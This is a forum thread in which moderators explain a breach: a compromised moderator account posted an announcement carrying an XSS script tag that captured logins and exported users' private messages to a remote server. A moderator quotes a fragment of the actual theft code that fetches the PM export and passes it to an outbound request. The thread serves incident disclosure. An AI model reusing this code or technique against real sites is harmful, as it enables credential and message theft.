question about the "Breach"

[DrPizza]

Ditto.

We're looking into the logs to double-check.

 

[FelixDeCat]

wow

 

[ViRGE]

wow

Yeah, it has been a real headache.

 

[ViRGE]

We're looking into the logs to double-check.

The logs have been double checked. The compromised mod account has no activity for global announcements predating yesterday. And as far as we're aware no other mod accounts were compromised.

 

[shortylickens]

How many of the 141 are fixed?

It took a whole day and multiple requests for me.

 

[ViRGE]

How many of the 141 are fixed?

It took a whole day and multiple requests for me.

All of the 141 were reset yesterday morning. I'm not quite sure what you mean by "fixed" beyond that.

 

[MWink]

I had to reset my password. So, was my account one of the ones compromised? Also, might I suggest putting a link to the password reset page in the announcement post.

 

[dmoney1980]

How many of the 141 are fixed?

It took a whole day and multiple requests for me.

My account is still locked, had to create a duplicate for the time being just to get PM access....

hope I can get this resolved soon

 

[Harvey]

My account is still locked, had to create a duplicate for the time being just to get PM access....

hope I can get this resolved soon

YGPM. Help is on the way.

Harvey
Senior AT Mod/Admin

 

[dmoney1980]

YGPM. Help is on the way.

Harvey
Senior AT Mod/Admin

Thanks again for your help!

 

[ViRGE]

I had to reset my password. So, was my account one of the ones compromised?

Yes.

 

[VirtualLarry]

A better question might be, how does a Mod account, have enough priviledges to create a script, that runs for everyone logged in, and not even having to view the announcement to run the script, not to mention, how do Mod accounts (and not Admin) accounts, have privs to read our PMs anyways?

I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact, not "private"?

And that some remote hacker did just that, and sucked up all of our PMs to some remote server?

How long until Mod accounts (and higher) require two-factor authentication? (RSA key fobs, cell-phone callbacks, or fingerprint or other biometric authentication devices?)

 

[ViRGE]

A better question might be, how does a Mod account, have enough priviledges to create a script, that runs for everyone logged in, and not even having to view the announcement to run the script

The script was hosted on a 3rd party server. There was a Javascript <script> tag in the title of the announcement, and as HTML was turned on for that announcement, the tag was not escaped and dutifully executed by clients. This is a stock feature of vB.

not to mention, how do Mod accounts (and not Admin) accounts, have privs to read our PMs anyways?

I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact, not "private"?

And that some remote hacker did just that, and sucked up all of our PMs to some remote server?

The PMs weren't stolen by going through mod accounts. They were stolen by the script executing on client computers, which in turn triggered the PM export option for the user's account and then piped the output of that to the remote server.*

Mods and Admins cannot read directly access user PMs. The only way around that is for the Admins to set your password to something they know so that they can log into your account. This is a very overt action that cannot be hidden, and is by design.

How long until Mod accounts (and higher) require two-factor authentication? (RSA key fobs, cell-phone callbacks, or fingerprint or other biometric authentication devices?)

We'll have to see what vB 5 brings us.

*The PM theft code in question

function getMessages() {
	$.get(PATH_FORUM + '../private.php?do=downloadpm&dowhat=xml', function(data) {
		request({ type: TYPE_USER, messages: escape((new XMLSerializer()).serializeToString(data)) });
	});
}

 

[sao123]

The PMs weren't stolen by going through mod accounts. They were stolen by the script executing on client computers, which in turn triggered the PM export option for the user's account and then piped the output of that to the remote server.*


*The PM theft code in question

function getMessages() {
    $.get(PATH_FORUM + '../private.php?do=downloadpm&dowhat=xml', function(data) {
        request({ type: TYPE_USER, messages: escape((new XMLSerializer()).serializeToString(data)) });
    });
}

Do we know the extent of what this particular script is capable of?
Could it steal passwords or from other sites which might have been accessed while it was running on the host PC?

this sounds worse than I thought...

 

[ViRGE]

No. That would require a Cross Site Scripting (XSS) vulnerability in the browser. Furthermore that is only part of the script; the script is hard-coded to our forums. The PATH_FORUM variable for example is our forum URL.

 

[sao123]

Although you have examined the logs, I will provide this, just in casse it could possibly give any benefit.

I went back and looked at my calander, and I can say within a high confidence level, that one of the possible breaches I noticed occurred in the period 7/7-7/9.
I was on a business trip and stuck in a hotel with my work laptop. I read lots, and only made a few posts. This is one of the instances im 90% sure I saw an odd global announcement.

 

[ViRGE]

We appreciate the input, sao. Not that we want to doubt you guys, there just isn't anything to back up that claim. Mods don't have the ability to delete logs, and the compromised account is clean prior to the 14th.

Either way, hopefully we have this fully nipped in the bud.

 

[Idontcare]

I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact, not "private"?

And that some remote hacker did just that, and sucked up all of our PMs to some remote server?

The "private" aspect of your private messages is that they are not public...i.e. they are not freely available for every other member of the forums to read.

Yes the moderators do everything reasonable and prudent to not see your private messages but the simple fact of the matter is that there are times when we need to read them for the sake of facilitating criminal investigations and so on.

So we cannot assure you your private message are any more private than the FCC can assure you that your telephone line is not tapped, or that your car is not currently carrying a GPS tracking device feeding information back to the FBI or CIA.

These are private messages, not ultra-super-duper top-secret "even the NSA can't see them" type private.

The private nature of a pm is merely casual, a privilege that can dissipate at any time as this particular breach has shown.

No mod wants to read your pm's, and if they did then you'd know they did because your password would be reset and you'd have an email telling you it was.

But there are plenty of hackers out there who do want to read your pm's, and those are the real boogeymen you should be worried about.

If you don't want the contents of your pm's to become public domain information then the only way to ensure that is to not use pm's. It isn't a secure system, it wasn't meant to be used as if it were.

It is a freely provided feature of these freely provided forums, maintained by a volunteer crew of moderators who freely give of their personal time to keep the forums somewhat cohesive and functional.

That alone should give you pause for consideration as to what you store, and how you view, the "private" aspects of the evidently hackable private messaging system.

 

[snor]

Were the passwords hashed or anything when taken? Or should be assume it was unencrypted when it was compromised? I changed my password anyways, but just curious regarding future security precautions...

 

[ViRGE]

Were the passwords hashed or anything when taken? Or should be assume it was unencrypted when it was compromised? I changed my password anyways, but just curious regarding future security precautions...

It wasn't a DB hack, it was an XSS hack. They didn't touch our DB; passwords were exposed by embedding a XSS that copied down users credentials as they entered them to log in. Which is why only 141 accounts were compromised.

 

[SolMiester]

Why would they take PMs if the only people who can read them are the owners?

 

[ViRGE]

Why would they take PMs if the only people who can read them are the owners?

They're exported as XML files and downloaded to the remote server. At which point the attacker can read them.

 

[pcslookout]

Why would they take PMs if the only people who can read them are the owners?

Exactly.

 

[Soundmanred]

Exactly.

They're exported as XML files and downloaded to the remote server. At which point the attacker can read them.

 

[pcslookout]

It wasn't a DB hack, it was an XSS hack. They didn't touch our DB; passwords were exposed by embedding a XSS that copied down users credentials as they entered them to log in. Which is why only 141 accounts were compromised.

Did they get Soundmanred?